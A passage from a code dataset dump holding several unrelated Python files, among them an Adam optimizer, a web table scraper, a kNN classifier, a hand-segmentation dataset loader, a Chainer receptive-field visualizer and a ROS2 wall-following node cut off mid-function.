db3.drop_data()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/Daniel_Carrasco/lesson10/assignment/src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"64085383","text":"import numpy as np\n# SOURCE: https://www.deeplearning.ai/deep-learning-specialization/\ndef initialize_adam(parameters,num_layers) :\n \"\"\"\n Initializes m and v as two python dictionaries with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\" \n - values: numpy arrays of zeros of the same shape as the corresponding gradients/parameters.\n \n Arguments:\n parameters -- python dictionary containing your parameters.\n parameters[\"W\" + str(l)] = Wl\n parameters[\"b\" + str(l)] = bl\n \n Returns: \n m -- python dictionary that will contain the exponentially weighted average of the gradient.\n v[\"dW\" + str(l)] = ...\n v[\"db\" + str(l)] = ...\n v -- python dictionary that will contain the exponentially weighted average of the squared gradient.\n s[\"dW\" + str(l)] = ...\n s[\"db\" + str(l)] = ...\n \"\"\"\n L = len(parameters) // num_layers # number of layers in the neural networks\n m = {} # first moment vector\n v = {} # second moment vector\n # Initialize m, v. Input: \"parameters\". Outputs: \"v, s\".\n for l in range(L):\n m[\"dW\" + str(l+1)] = np.zeros_like(parameters[\"W\" + str(l+1)])\n m[\"db\" + str(l+1)] = np.zeros_like(parameters[\"b\" + str(l+1)])\n v[\"dW\" + str(l+1)] = np.zeros_like(parameters[\"W\" + str(l+1)])\n v[\"db\" + str(l+1)] = np.zeros_like(parameters[\"b\" + str(l+1)])\n return m, v\ndef update_parameters_with_adam(parameters,num_layers, grads, m, v, t, learning_rate = 0.01,\n beta1 = 0.9, beta2 = 0.999, epsilon = 1e-8):\n \"\"\"\n Update parameters using Adam\n \n Arguments:\n parameters -- python dictionary containing your parameters:\n parameters['W' + str(l)] = Wl\n parameters['b' + str(l)] = bl\n grads -- python dictionary containing your gradients for each parameters:\n grads['dW' + str(l)] = dWl\n grads['db' + str(l)] = dbl\n m -- Adam variable, moving average of the first gradient, python dictionary\n v -- Adam variable, moving average of the squared gradient, python dictionary\n learning_rate -- the learning rate, scalar.\n beta1 -- Exponential decay hyperparameter for the first moment estimates \n beta2 -- Exponential decay hyperparameter for the second moment estimates \n epsilon -- hyperparameter preventing division by zero in Adam updates\n Returns:\n parameters -- python dictionary containing your updated parameters \n m -- Adam variable, moving average of the first gradient, python dictionary\n v -- Adam variable, moving average of the squared gradient, python dictionary\n \"\"\"\n L = len(parameters) // num_layers # number of layers in the neural networks\n m_corrected = {} # Initializing first moment estimate, python dictionary\n v_corrected = {} # Initializing second moment estimate, python dictionary\n # Perform Adam update on all parameters\n for l in range(L):\n # Moving average of the gradients. Inputs: \"m, grads, beta1\". Output: \"m\".\n m[\"dW\" + str(l+1)] = beta1 * m[\"dW\" + str(l+1)] + (1 - beta1) * grads[\"dW\" + str(l+1)]\n m[\"db\" + str(l+1)] = beta1 * m[\"db\" + str(l+1)] + (1 - beta1) * grads[\"db\" + str(l+1)]\n # Compute bias-corrected first moment estimate. Inputs: \"m, beta1, t\". 
Output: \"m_corrected\".\n m_corrected[\"dW\" + str(l+1)] = m[\"dW\" + str(l+1)] / (1 - np.power(beta1,t))\n m_corrected[\"db\" + str(l+1)] = m[\"db\" + str(l+1)] / (1 - np.power(beta1,t))\n # Moving average of the squared gradients. Inputs: \"v, grads, beta2\". Output: \"v\".\n v[\"dW\" + str(l+1)] = beta2 * v[\"dW\" + str(l+1)] + (1 - beta2) * np.power(grads[\"dW\" + str(l+1)],2)\n v[\"db\" + str(l+1)] = beta2 * v[\"db\" + str(l+1)] + (1 - beta2) * np.power(grads[\"db\" + str(l+1)],2)\n # Compute bias-corrected second raw moment estimate. Inputs: \"v, beta2, t\". Output: \"v_corrected\".\n v_corrected[\"dW\" + str(l+1)] = v[\"dW\" + str(l+1)] / (1 - np.power(beta2,t))\n v_corrected[\"db\" + str(l+1)] = v[\"db\" + str(l+1)] / (1 - np.power(beta2,t))\n # Update parameters. Inputs: \"parameters, learning_rate, m_corrected, v_corrected, epsilon\". Output: \"parameters\".\n parameters[\"W\" + str(l+1)] = parameters[\"W\" + str(l+1)] - learning_rate * m_corrected[\"dW\" + str(l+1)] / (np.sqrt(v_corrected[\"dW\" + str(l+1)]) + epsilon)\n parameters[\"b\" + str(l+1)] = parameters[\"b\" + str(l+1)] - learning_rate * m_corrected[\"db\" + str(l+1)] / (np.sqrt(v_corrected[\"db\" + str(l+1)]) + epsilon)\n return parameters, m, v","sub_path":"autonomous_driving/challenge/Adam1.py","file_name":"Adam1.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537205650","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport os\nimport pandas as pd\n\ndef scrape_data(url):\n site=requests.get(url).text\n soup=bs(site,'lxml')\n #s=soup.prettify()\n table=soup.find('div',class_='table-responsive').find('table',class_='table table-hover table-condensed')\n headers = []\n for i in table.find_all('th'):\n title = i.text\n headers.append(title)\n row_data=[] \n for j in table.find_all('tr'): \n row_temp=[]\n for k in j.find_all('td'):\n row_temp.append(k.text)\n row_data.append(row_temp)\n \n df = pd.DataFrame(columns = headers,data=row_data)\n df.to_csv(os.path.join('population.csv'))\n print(df.shape)\n \nurl=\"https://www.worldometers.info/world-population/world-population-projections/\" \nscrape_data(url)\n \n# from requests import Session\n# from bs4 import BeautifulSoup as bs\n \n# with Session() as s:\n# site = s.get(\"http://quotes.toscrape.com/login\")\n# bs_content = bs(site.content, \"html.parser\")\n# #print(bs_content)\n# token = bs_content.find(\"input\", {\"name\":\"csrf_token\"})[\"value\"]\n# login_data = {\"username\":\"admin\",\"password\":\"12345\", \"csrf_token\":token}\n# s.post(\"http://quotes.toscrape.com/login\",login_data)\n# home_page = s.get(\"http://quotes.toscrape.com\")\n# print((home_page.content))\n\n# import csv\n# import requests\n# from bs4 import BeautifulSoup\n\n\n# def scrape_data(url):\n\n# response = requests.get(url, timeout=10)\n# soup = BeautifulSoup(response.content, 'html.parser')\n\n# table = soup.find_all('table')[1]\n\n# rows = table.select('tbody > tr')\n\n# header = [th.text.rstrip() for th in rows[0].find_all('th')]\n\n# with open('output.csv', 'w') as csv_file:\n# writer = csv.writer(csv_file)\n# writer.writerow(header)\n# for row in rows[1:]:\n# data = [th.text.rstrip() for th in row.find_all('td')]\n# print(data)\n# #writer.writerow(data)\n\n\n# # if __name__==\"__main__\":\n# url = \"https://en.wikipedia.org/wiki/List_of_countries_and_dependencies_by_population\"\n# 
scrape_data(url)\n\n","sub_path":"scraping/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"611125560","text":"import os\nfrom pathlib import Path\nfrom collections import namedtuple\n\nDirectory = namedtuple('Directory', ['owners', 'dependencies'])\n\nOWNERS = '/OWNERS'\nDEPENDENCIES = '/DEPENDENCIES'\nDEBUG = True\n\ndef check_directory(directory):\n    if DEBUG:\n        print('checking {}'.format(directory))\n    owners_file = Path(directory + OWNERS)\n    dependency_file = Path(directory + DEPENDENCIES)\n    owners_data = read_file(owners_file) if owners_file.exists() else None\n    dependency_data = read_file(dependency_file) if dependency_file.exists() else None\n    return Directory(owners=owners_data, dependencies=dependency_data)\n\n\ndef read_file(file_path):\n    with open(file_path, 'r') as data:\n        return [line.strip() for line in data.readlines()]\n\ndef main():\n    ROOT = os.getcwd() + '/src'\n    print(check_directory(ROOT))\n    print(check_directory(ROOT + '/backend'))\n\nmain()","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"454006873","text":"print(\"Welcome to the tip calculator!\")\nbill_amount = float(input(\"What's the total bill amount? Rs. \"))\ntip = int(input(\"What percentage tip would you like to give? 10, 12, 15? \"))\nperson = int(input(\"How many people are sharing the bill? \"))\n\ntip_percentage = tip / 100\ntotal_amount = bill_amount * tip_percentage\ntotal_bill = bill_amount + total_amount\neach_share = total_bill / person\namount = round(each_share)\n\nprint(f\"Each person's share is: Rs. {amount}\")\n","sub_path":"code_2_0.py","file_name":"code_2_0.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"635450827","text":"from Algorithms.Optimizer import Optimizer\nfrom Utils.Matrix import add_ones_column\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass LinearRegression:\n    def __init__(self, optimizer: Optimizer, xs, ys):\n        self.xs = xs\n        self.ys = ys\n        self.optimizer = optimizer\n        self.cost_fn = cost_fn\n        self.thetas = None\n        self.j_values = None\n\n    def run(self, steps, alpha) -> (np.ndarray, np.ndarray):\n        self.thetas, self.j_values = self.optimizer.run(steps, alpha, self.xs, self.ys)\n        return self.thetas, self.j_values\n\n    def plot(self):\n        plt.subplot(2, 1, 1)\n        plt.plot(self.j_values)\n        plt.subplot(2, 1, 2)\n        plt.plot(self.xs, self.ys, 'ro')\n        plt.plot(self.xs, self.optimizer.h(add_ones_column(self.xs), self.thetas))\n        plt.show()\n\n    def describe(self):\n        pass\n\n    def predict(self, xs: np.ndarray):\n        xs = add_ones_column(xs)\n        return self.optimizer.h(xs, self.thetas)\n\n\ndef cost_fn(xs, ys, thetas):\n    square = np.vectorize(np.square)\n    m = np.size(xs, 0)  # m is the number of training examples (rows of xs), not the column count\n    b = sum(square((xs @ thetas.T) - ys))\n    return (1 / (2 * m)) * b\n","sub_path":"Regression/LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"321960742","text":"import pyblish.api\n\n\nclass CollectExample(pyblish.api.InstancePlugin):\n    \"\"\"Collect something for example validation\n\n    ```\n    instance.data {\n        example: my example\n    }\n    ```\n\n    \"\"\"\n\n    label = "Collect Example"\n    families = 
[\"config.example\"]\n order = pyblish.api.CollectorOrder + 0.1\n hosts = [\"maya\"]\n\n def process(self, instance):\n instance.data.update(\n {\n \"example\": self._collect_example(instance)\n }\n )\n\n @staticmethod\n def _collect_example(instance):\n from maya import cmds\n return cmds.ls(\"example\")\n","sub_path":"plugins/maya/tasks/__example__/publish/example_collector.py","file_name":"example_collector.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"280010338","text":"from __future__ import print_function\r\nimport torch.utils.data as data\r\nfrom PIL import Image\r\nimport os\r\nimport os.path\r\nimport errno\r\nimport numpy as np\r\nimport torch\r\nimport codecs\r\nimport random\r\nfrom path import Path\r\nfrom scipy.misc import imread, imresize\r\nimport scipy.io as sio\r\n\r\n\r\nclass Handseg_RHD(data.Dataset):\r\n \"\"\"`Ox `_ Dataset.\r\n\r\n Args:\r\n root (string): Root directory of dataset\r\n train (bool, optional): If True, creates dataset from ``training.pt``,\r\n otherwise from ``test.pt``.\r\n download (bool, optional): If true, downloads the dataset from the internet and\r\n puts it in root directory. If dataset is already downloaded, it is not\r\n downloaded again.\r\n transform (callable, optional): A function/transform that takes in an PIL image\r\n and returns a transformed version. E.g, ``transforms.RandomCrop``\r\n target_transform (callable, optional): A function/transform that takes in the\r\n target and transforms it.\r\n \"\"\"\r\n training_file = 'training/'\r\n test_file = 'evaluation/'\r\n \r\n def __init__(self, root, train=True, transform=None, target_transform=None, download=False, vis=False):\r\n self.root = os.path.expanduser(root)\r\n self.transform = transform\r\n self.target_transform = target_transform\r\n self.train = train # training set or test set\r\n self.vis = vis\r\n if self.train:\r\n self.train_root = (Path(self.root) / self.training_file / 'color')\r\n self.train_samples = self.collect_samples(self.train_root, self.training_file)\r\n else:\r\n self.test_root = (Path(self.root) / self.test_file / 'color')\r\n self.test_samples = self.collect_samples(self.test_root, self.test_file)\r\n \r\n def collect_samples(self, root, file):\r\n samples = []\r\n for img in sorted((root).glob('*.png')):\r\n _img = img.basename().split('.')[0]\r\n label = (Path(self.root) / file / 'hand_mask' / _img + '.png')\r\n if self.train:\r\n assert label.exists()\r\n sample = {'img': img, 'label': label}\r\n samples.append(sample)\r\n return samples\r\n \r\n def load_samples(self, s):\r\n image = imread(s['img'], mode='RGB')\r\n try:\r\n label = imread(s['label'], mode='L')\r\n except:\r\n label = image\r\n return [image, label]\r\n\r\n def __getitem__(self, index):\r\n \"\"\"\r\n Args:\r\n index (int): Index\r\n\r\n Returns:\r\n tuple: (image, target) where target is index of the target class.\r\n \"\"\"\r\n \r\n if self.train:\r\n s = self.train_samples[index]\r\n else:\r\n s = self.test_samples[index]\r\n image, target = self.load_samples(s)\r\n # doing this so that it is consistent with all other datasets\r\n # to return a PIL Image\r\n img = Image.fromarray(np.array(image), mode='RGB')\r\n # target = Image.fromarray(np.array(image))\r\n h, w = img.size[0], img.size[1]\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n if self.target_transform is not None:\r\n target = self.target_transform(target)\r\n \r\n target = imresize(target, (256, 
256))\r\n \r\n hand_mask = (target / 255).astype('uint8')\r\n bg_mask = np.logical_not((target/255).astype('uint8')).astype('uint8')\r\n target = np.stack((bg_mask, hand_mask), axis=2)\r\n if self.vis:\r\n return img, target.astype('float'), image\r\n return img, target.astype('float')\r\n \r\n def __len__(self):\r\n if self.train:\r\n return len(self.train_samples)\r\n else:\r\n return len(self.test_samples)\r\n \r\n def __repr__(self):\r\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\r\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\r\n tmp = 'train' if self.train is True else 'test'\r\n fmt_str += ' Split: {}\\n'.format(tmp)\r\n fmt_str += ' Root Location: {}\\n'.format(self.root)\r\n tmp = ' Transforms (if any): '\r\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\r\n tmp = ' Target Transforms (if any): '\r\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\r\n return fmt_str\r\n\r\n\r\ndef visual_box(data, output, i):\r\n import cv2\r\n import scipy\r\n img = Image.fromarray(np.array(data).squeeze(), mode='RGB')\r\n h, w = img.size[0], img.size[1]\r\n output = np.array(output).squeeze()\r\n output[::2] = output[::2] * w\r\n output[1::2] = output[1::2] * h\r\n img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\r\n for j in range(0, 8, 2):\r\n cv2.circle(img, (int(output[j + 1]), int(output[j])), 5, (255, 255, 0), -1)\r\n # box format (w1, h1, w2, h2, ...)\r\n cv2.imwrite('/Data/hand_dataset_ox/vis/{:05d}.jpg'.format(i), img)\r\n print('img saving to \\'/Data/hand_dataset_ox/vis/{:05d}.jpg\\''.format(i))\r\n\r\ndef process_hand_mask():\r\n import cv2\r\n from collections import Counter\r\n root = Path('/Data/RHD_v1-1/RHD_published_v2')\r\n file = 'evaluation'\r\n masks = sorted((root / file / 'mask').glob('*.png'))\r\n hand_mask_dir = root / file / 'hand_mask'\r\n hand_mask_dir.mkdir_p()\r\n print('total mask png {}'.format(len(masks)))\r\n for i in range(len(masks)):\r\n print('processing {}/{}'.format(i, len(masks)))\r\n mask = cv2.imread(masks[i],cv2.IMREAD_GRAYSCALE)\r\n mask_hand = mask > 1 # True for hand, False for bg\r\n mask_hand = mask_hand.astype('uint8') * 255\r\n cv2.imwrite(hand_mask_dir / masks[i].basename(), mask_hand)\r\n print(1)\r\n \r\ndef visual_mask(image, output, target, i ):\r\n import cv2\r\n save_root = Path('./visual_mask')\r\n print('saving to {}/{:05d}'.format(save_root, i))\r\n target = torch.argmax(target, dim=3).squeeze() * 255\r\n\r\n output = torch.argmax(output.permute([0,2,3,1]), dim=3).squeeze() * 255\r\n # output =\r\n # cv2.imwrite(save_root / '{:05}_mask_hand.png'.format(i), (np.array(target.squeeze()[:,:,1])*255).astype('uint8'))\r\n # cv2.imwrite(save_root / '{:05}_mask_hand.png'.format(i), (np.array(target.squeeze()[:, :, 0])*255).astype('uint8'))\r\n output = np.array(output).astype('uint8')\r\n target = np.array(target).astype('uint8')\r\n image = np.array(image).squeeze().astype('uint8')\r\n cv2.imwrite(save_root / '{:05}.png'.format(i), cv2.cvtColor(image,cv2.COLOR_RGB2BGR))\r\n cv2.imwrite(save_root / '{:05}_pre.png'.format(i), output)\r\n cv2.imwrite(save_root / '{:05}_mask.png'.format(i), target)\r\n\r\nif __name__ == '__main__':\r\n process_hand_mask()\r\n # import shutil\r\n #\r\n # data = Path('/Data/RHD_v1-1/RHD_published_v2/evaluation/')\r\n # imgs = data.glob(\"*.png\")\r\n # imgs.sort()\r\n #\r\n # for i in range(len(imgs)):\r\n # shutil.copyfile(imgs[i], 
data/'color'/\"real_{:05d}.png\".format(i))","sub_path":"data_loader/hand_seg_RHD.py","file_name":"hand_seg_RHD.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"25122436","text":"from django.urls import include, path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom . import views\n\napp_name = 'dal'\nurlpatterns = [\n    path('prefix/', views.prefix, name='prefix'),\n    path('obs/', views.obstype, name='obstype'),\n    path('proc/', views.proctype, name='proctype'),\n    path('prod/', views.prodtype, name='prodtype'),\n    path('rawreq/', views.rawreq, name='rawreq'),\n    path('fnreq/', views.filenamereq, name='filenamereq'),\n    path('ingestreq/', views.ingestreq, name='ingestreq'),\n    path('ingestrec/', views.ingestrec, name='ingestrec'),\n    path('supportreq/', views.supportreq, name='supportreq'),\n    path('floatreq/', views.floatreq, name='floatreq'),\n    path('hdrfuncs/', views.hdrfuncs, name='hdrfuncs'),\n    path('errcodes/', views.errcodes, name='errcodes'),\n]\n","sub_path":"marssite/tada/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"637923860","text":"import pandas as pd\nimport numpy as np\nfrom abstract_classifier import AbstractClassifier\nfrom learning_lib import distance_metric\n\n\nclass KNNClassifier(AbstractClassifier):\n    def fit(self, X_train, y_train):\n        # There is no \"training\" step in kNN\n        self.X_train = X_train\n        self.y_train = y_train\n\n    def predict(self, X_test):\n        predictions = []\n        for _, instance in X_test.iterrows():\n            predictions.append(self.k_nearest_neighbor(instance, k=3))\n        return np.array(predictions)\n\n    def k_nearest_neighbor(self, target, k=1):\n        # Build an indexed distance map\n        indexes = {}\n        for i, instance in self.X_train.iterrows():\n            indexes[i] = distance_metric(instance, target)\n        # Sort the map by distance (ascending) and take the shortest k instances\n        k_nearest_dists = sorted(indexes.items(), key=lambda kv: kv[1])[:k]\n        # Throw away the distances leaving the indexes\n        k_nearest_indexes = list(map(lambda d: d[0], k_nearest_dists))\n        # Collect the training classes associated with the predicted indexes\n        counts = np.bincount(np.array(self.y_train[k_nearest_indexes]))\n        # Return the most frequently occurring class as the winning predicted class\n        return np.argmax(counts)\n","sub_path":"04-knn/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183520007","text":"\n'''\n    Visualizes the receptive field of a network\n    class VisNetwork\n'''\n\nimport math\nimport heapq\nimport numpy as np\nfrom chainer import function_node\nfrom chainer import variable\n\n\n\n\ndef add_element(dic, key, val):\n    if key in dic:\n        dic[key].append(val)\n    else:\n        dic[key] = [val]\n    return dic\n\n# https://medium.com/mlreview/a-guide-to-receptive-field-arithmetic-for-convolutional-neural-networks-e0f514068807\ndef outFromIn(conv, layerIn, cover_all=False):\n    n_in = layerIn[0]\n    j_in = layerIn[1]\n    r_in = layerIn[2]\n    start_in = layerIn[3]\n    k = conv[0]\n    s = conv[1]\n    p = conv[2]\n    if cover_all:\n        n_out = math.floor((n_in - k + 2*p + s-1)/s) + 1\n    else:\n        n_out = math.floor((n_in - k + 2*p)/s) + 1\n    actualP = (n_out-1)*s - n_in + k \n    pR = math.ceil(actualP/2)\n    pL = math.floor(actualP/2)\n\n    j_out = j_in * s\n    r_out = r_in + (k - 1)*j_in\n    start_out = start_in + 
((k-1)/2 - pL)*j_in\n    #start_out = start_in + ((k-1)/2 - p)*j_in\n    return n_out, j_out, r_out, start_out\n\nclass FunctionCell:\n    def __init__(self, edge_list):\n        self.function = None\n        self.inputs = []\n        self.outputs = []\n        \n        self.n_required_var = 0\n        self.required_var_cnt = 0\n        self.input_vars = []\n        self.output = None\n        for index, edge in edge_list:\n            if index == 0:\n                self.function = edge[index]\n                self.outputs.append(edge[1])\n            elif index == 1:\n                self.function = edge[index]\n                self.inputs.append(edge[0])\n        \n        self._set_require_var()\n        \n        # define function information\n        if 'Pooling' in self.function.label:\n            info = [self.function.kw, self.function.sx, self.function.pw]\n            self.cover_all = self.function.cover_all\n        elif 'Convolution' in self.function.label:\n            W = self.function.inputs[1]\n            info = [W.shape[-1], self.function.sx, self.function.pw]\n            self.cover_all = self.function.cover_all\n        else:\n            info = None\n            self.cover_all = None\n        self.info = info\n\n    def _set_require_var(self):\n        if '_ + _' in self.function.label:\n            self.n_required_var = 2\n        else:\n            self.n_required_var = 1\n\n    def _reset_cnt(self):\n        self.required_var_cnt = 0\n    \n    def _reset(self):\n        self._reset_cnt()\n        self.input_vars = []\n        self.output = None\n    \n    def receptive_field(self):\n        if len(self.input_vars) == 0:\n            raise TypeError('input_vars should not be an empty list. Please assign a value')\n        \n        if self.info is None:\n            if self.n_required_var > 1:\n                # Add function_node\n                max_var = (-1, -1, -1, -1)\n                for var in self.input_vars:\n                    if max_var[2] < var[2]:\n                        max_var = var\n                return max_var\n            else:\n                # otherwise return input of index 0\n                return self.input_vars[0]\n        elif self.n_required_var == 1:\n            # Convolution, Pooling\n            return outFromIn(self.info, self.input_vars[0], cover_all=self.cover_all)\n\n\nclass VisNetwork:\n    def __init__(self, f_cells, input_nodes):\n        self.input_nodes = input_nodes\n        self.function_edges = []\n        for cell_i in f_cells:\n            for out in cell_i.outputs:\n                for cell_j in f_cells:\n                    if out in cell_j.inputs:\n                        self.function_edges.append((cell_i, cell_j))\n                        cell_i._reset_cnt()\n                        cell_j._reset_cnt()\n        self.first_functions = []\n        for in_node in self.input_nodes:\n            for edge in self.function_edges:\n                if in_node in edge[0].inputs:\n                    self.first_functions.append({'edge':edge, 'input':in_node})\n        self.last_cell = None\n    \n    def _reset(self):\n        for cell_i, cell_j in self.function_edges:\n            cell_i._reset()\n            cell_j._reset()\n    \n    def __call__(self, x=None, mode='construct'):\n        if mode == 'construct':\n            return self.construct()\n        elif mode == 'receptive' or mode == 'rf':\n            return self.get_receptive_field(x)\n    \n    def construct(self):\n        self._reset()\n        # walk the graph forward from each input, recording the path labels\n        def _rec_fw(current_edge, x):\n            break_flag = True\n            next_edges = []\n            y = x+'->'+current_edge[0].function.label\n            for edge in self.function_edges:\n                if current_edge[1] == edge[0]:\n                    break_flag = False\n                    next_edges.append(edge) \n            \n            current_edge[1].input_vars.append(y)\n            current_edge[1].required_var_cnt += 1\n\n            if current_edge[1].required_var_cnt < current_edge[1].n_required_var:\n                break_flag = True\n\n            if break_flag:\n                if len(next_edges) == 0:\n                    self.last_cell = current_edge\n                    return 'end:' + y+'->'+current_edge[1].function.label\n                return None\n            ress = []\n            for next_edge in next_edges:\n                res = _rec_fw(next_edge, y)\n                if res is not None and len(res) > 0:\n                    ress.append(res)\n            ress = np.asarray(ress)\n            ress = np.squeeze(ress)\n            if ress is None:\n                ress = None\n            else:\n                ress = np.delete(ress, np.where(ress == None)[0])\n                ress = ress.tolist() \n            return ress\n        \n        for f_edge in 
self.first_functions:\n res = _rec_fw(f_edge['edge'], 'input')\n print(res)\n\n def calc_receptive_field(self):\n self._reset()\n def _rec_fw(current_edge):\n break_flag = True\n next_edges = []\n # calc receptive field\n y = current_edge[0].receptive_field()\n current_edge[0].output = y\n for edge in self.function_edges:\n if current_edge[1] == edge[0]:\n break_flag = False\n next_edges.append(edge) \n \n current_edge[1].input_vars.append(y)\n current_edge[1].required_var_cnt += 1\n if current_edge[1].required_var_cnt < current_edge[1].n_required_var:\n break_flag = True\n if break_flag:\n if len(next_edges) == 0:\n self.last_cell = current_edge[1]\n current_edge[1].output = current_edge[1].receptive_field()\n return None\n return None\n \n for next_edge in next_edges:\n _rec_fw(next_edge)\n \n layer_infos = []\n for f_edge in self.first_functions:\n imsize = f_edge['input'].data.shape[2:][0]\n layerInfo = (imsize, 1, 1, 0.5)\n f_edge['edge'][0].input_vars.append(layerInfo)\n res = _rec_fw(f_edge['edge'])\n if res is not None:\n layer_infos.append(res)\n \n self.layer_infos = layer_infos\n\n def get_receptive_field(self, neuron_index):\n if self.last_cell is None:\n self.calc_receptive_field()\n layer_info = self.last_cell.output\n n, j, rf, start = layer_info\n if isinstance(neuron_index, tuple):\n center_y = start + (neuron_index[1])*j\n center_x = start + (neuron_index[0])*j\n else:\n center_y = start + (neuron_index//n)*j\n center_x = start + (neuron_index%n)*j\n return (center_x, center_y) , (rf/2, rf/2)\n\ndef get_rf_visualizer(input_var, feature_map):\n cands = []\n seen_edges = set()\n nodes = set()\n push_count = [0]\n \n def add_cand(cand):\n heapq.heappush(cands, (-cand.rank, push_count[0], cand))\n push_count[0] += 1\n\n if isinstance(feature_map, list):\n outputs = feature_map\n else:\n outputs = [feature_map]\n\n for o in outputs:\n if isinstance(o, variable.Variable):\n o = o.node\n add_cand(o)\n nodes.add(o)\n\n while cands:\n _, _, cand = heapq.heappop(cands)\n if isinstance(cand, variable.VariableNode):\n creator = cand.creator_node\n if creator is not None and (creator, cand) not in seen_edges:\n add_cand(creator)\n seen_edges.add((creator, cand))\n nodes.add(creator)\n nodes.add(cand)\n elif isinstance(cand, function_node.FunctionNode):\n for input_ in cand.inputs:\n if input_ is not cand and (input_, cand) not in seen_edges:\n add_cand(input_)\n seen_edges.add((input_, cand))\n nodes.add(input_)\n nodes.add(cand)\n \n function_node_dict = {}\n for edge in seen_edges:\n if isinstance(edge[0], function_node.FunctionNode):\n function_node_dict = add_element(function_node_dict, hex(id(edge[0])), (0, edge))\n elif isinstance(edge[1], function_node.FunctionNode):\n function_node_dict = add_element(function_node_dict, hex(id(edge[1])), (1, edge))\n\n f_cells = []\n for key in function_node_dict:\n f_cells.append(FunctionCell(function_node_dict[key]))\n\n return VisNetwork(f_cells, [input_var._node])\n","sub_path":"src/receptive_visualizer.py","file_name":"receptive_visualizer.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228271583","text":"import rclpy\nimport numpy as np\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile\nfrom std_msgs.msg import Float32MultiArray\nfrom geometry_msgs.msg import Twist\nfrom automate_turtlebot3_pkg.tf_utils import TFUtils\n\nclass WallFollower(Node):\n def __init__(self, node_name: str = 'automate_turtlebot', **kwargs: dict):\n 
super(WallFollower, self).__init__(node_name=node_name, **kwargs)\n qos = QoSProfile(depth=1)\n\n # sensor variable\n self.distance_array = np.zeros(3)\n\n # state variable\n self.current_yaw = 0.\n\n # logic variable\n self.target_yaw = 0.\n self.current_state = 'start'\n self.turn_deg = 87.\n\n # Declaring cmd_vel to publish Twist\n self.control_publisher = self.create_publisher(Twist, \"/cmd_vel\", qos)\n\n # initialize subscription\n self.create_subscription(Float32MultiArray, '/min_dis', self.sensor_subscribe_callback, qos)\n\n # initialize timer function for control\n self._control_period = 0.1\n self.create_timer(self._control_period, self.control_timer_callback)\n\n # initialize timer function for state acquisition\n self._state_period = 0.1\n self.tf_utils = TFUtils(self, False)\n self.create_timer(self._state_period, self.state_timer_callback)\n\n def sensor_subscribe_callback(self, msg: Float32MultiArray):\n \"\"\"read sensor data and update self.distance_array\"\"\"\n self.distance_array = msg.data\n\n def state_timer_callback(self, ):\n \"\"\" read tf and update current yaw\"\"\"\n transform = self.tf_utils.lookup_transform(\n target_frame='base_link',\n source_frame='odom',\n convert=False,\n when=None)\n self.current_yaw = self.euler_from_quaternion(\n transform.transform.rotation)[2]\n\n \n def create_turnright_msg(self) -> Twist:\n turn_right = Twist()\n turn_right.linear.x = 0.0\n turn_right.linear.y = 0.0\n turn_right.linear.z = 0.0\n turn_right.angular.x = 0.0\n turn_right.angular.y = 0.0\n turn_right.angular.z = -0.1\n return turn_right\n\n def create_turnleft_msg(self) -> Twist:\n turn_left = Twist()\n turn_left.linear.x = 0.0\n turn_left.linear.y = 0.0\n turn_left.linear.z = 0.0\n turn_left.angular.x = 0.0\n turn_left.angular.y = 0.0\n turn_left.angular.z = 0.1\n return turn_left\n\n def create_forward_msg(self) -> Twist:\n fwd_msg = Twist()\n fwd_msg.linear.x = 0.2\n fwd_msg.linear.y = 0.0\n fwd_msg.linear.z = 0.0\n fwd_msg.angular.x = 0.0\n fwd_msg.angular.y = 0.0\n fwd_msg.angular.z = 0.0\n return fwd_msg\n\n def create_stop_msg(self) -> Twist:\n stop_drive = Twist()\n stop_drive.linear.x = 0.0\n stop_drive.linear.y = 0.0\n stop_drive.linear.z = 0.0\n stop_drive.angular.x = 0.0\n stop_drive.angular.y = 0.0\n stop_drive.angular.z = 0.0\n return stop_drive \n\n\n def euler_from_quaternion(self, quat):\n \"\"\"\n Convert quaternion (w in last place) to euler roll, pitch, yaw.\n quat = [x, y, z, w]\n \"\"\"\n x = quat.x\n y = quat.y\n z = quat.z\n w = 